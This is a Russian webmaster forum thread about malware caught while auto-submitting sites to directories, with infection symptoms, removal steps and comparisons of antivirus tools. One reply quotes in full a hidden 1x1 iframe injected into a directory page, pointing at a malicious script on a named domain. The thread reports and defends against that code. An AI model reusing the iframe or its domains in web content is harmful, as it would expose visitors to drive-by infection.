Внимание! Вирусы!

Kislov
На сайте с 29.04.2006
Offline
185
1246

После прогона по каталогам, всегда находишь у себя пару тройку вирусов.

Администраторы каталогов, проверяйте свои каталоги на предмет заражения.

На форуме была темка с рекомендациями. Проверяйте на ифреймы.

Обнаружил вредоносный код название не важно, ибо каждый антивирь выдаёт что-то новенькое.

Признаки:

1. Убивает полностью DrWeb.

2. Система работает не стабильно - зависание при загрузке (пока не выгрузишь модули Веба не загрузится полностью), некорректное завершение работы (система не выключается, а зависает на этапе Сохранение параметров).

3. Наличие дубля процесса winlogon.exe (в Диспетчере не отображается).

4. Запросы на подключение к каким-то левым айпи.

Лечение:

0. В OutPost добавляем процесс в запрещенные приложения.

1. Если стоит DrWeb, полностью сносим или вырубаем.

2. Вырубаем процесс winlogon.exe (у меня выключить дубль не получилось, поэтому был удалён при перезагрузке). Юзал прогу WinPatrol. Только не удалите системный файл, ибо прийдёт капут.

3. Сканируем систему. Юзал Nod32.

В этой теме прошу выкладывать новые экземпляры.

zaka4ek
На сайте с 24.03.2007
Offline
209
#1
Kislov:

3. Сканируем систему. Юзал Nod32.

По моему нод пропускает много...

Каспер сканит все страницы и блочит трояны.... К тому же юзаю internet sec. очень доволен =) Не сочтите за рекламу...

Продвигай с умом Sape (http://www.sape.ru/r.yoJRtSiZZR.php) Продвигай с умом Gogetlinks (https://gogetlinks.net/?inv=sya7n2)
kxk
На сайте с 30.01.2005
Offline
990
kxk
#2

zaka4ek, Drweb лицензионный успешно борется с теми гадостями о которых касперскому и неизвестно проверено на своём опыте, юзаю связку KIS +Drweb комар ещё не проскочил

Ваш DEVOPS
ШO
На сайте с 27.12.2005
Offline
375
#3

Ноду вири тоже грохают очень успешно...

zzzzz
На сайте с 12.12.2006
Offline
204
#4

Я здесь /ru/forum/144438 тоже описал борьбу с вирусом в подробности, и какими за это время антивирусами пользовался, но окончательно с проблемой только каспер справился, нашёл и уничтожил всех :)

/////
sevan
На сайте с 03.03.2006
Offline
139
#5
Kislov:
После прогона по каталогам, всегда находишь у себя пару тройку вирусов.

Лечение:
0. В OutPost добавляем процесс в запрещенные приложения.

а какой процесс то в запрещенные добавлять???

Не Аллсубмиттер же ведь :)

У меня в режиме "Запрещать" АутПост трудится, так что вроде процессов новых без спросу возникнуть не должно...

А вот что делать, если внедрение происходит в легальный процесс?

Видимо, только вручную перелопачивать правила и запрещать в них известные домены с ифреймами

только сегодня обнаружил вот тут:

хttp://www.3sm.ru/index.php?adds=1

внизу дописано:

<iframe src="http://www.shelma.ru/uploads/port.php" width="1" height="1" frameborder="0" scrolling="no""></iframe>

а там уж - небезизвестный всем mdfc.info

Обнаружил все это бесплатный AntiVir в АллСубмиттере

запретил 2 домена shelma.ru и mdfc.info в Аутпосте - даже каталог не стал в черный список вносить - жду когда хозяин обнаружит все и исправит

Disell
На сайте с 05.06.2006
Offline
253
#6

Да сейчас много каталогов создается именно для спама , впаривания троянов вирусов, и всякой прочей нечести.

Регистрируйтесь в хороших добротных и известных. Нечего по помойкам на автомате лазить. Все равно каталожное не имеет былой силы. Что гонятся за призрачными помоечными беками, 5 копеек экономии зато последствия могут встать не в одну сотню, а то и тысячу.

Лучшие вакансии ( http://hh.ru ) РУнета. Построй свою карьеру ( http://career.ru )
Kislov
На сайте с 29.04.2006
Offline
185
#7

kxk, если вирус убил DrWeb, то как он бороться будет? :)

Y
На сайте с 09.06.2007
Offline
7
#8

При автопрогоне в 3000 досок обьяв:

Тестировал 4 атривируса:

ДокторВеб - пропускал все

Касперский 6.0 - нашол 6 вирусов

Нод - нашол 2 вируса

AVP бесплатный - пропускал все

KL
На сайте с 06.06.2007
Offline
5
#9

Пользуюсь касперским и очень доволен, всем советую, отдача на 80%, все почти замечает

Продаю все, что можно продать!!! Прошу не писать я не Лебедев Белый каталог сайтов (http://www.platinet.net.ru) Продвижение сайтов,крупное рекламное агентство (http://www.rang56.ru)
porh
На сайте с 14.06.2006
Offline
169
#10

Перепробывал в своё время кучу антивирусов, и остановился на Pande. За несколько лет активной работы в интернете Panda ни разу не подвела.. Единственный недостаток - заметно подгружает комп. А у сурьёзных сеошников Panda почему-то не в почёте

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий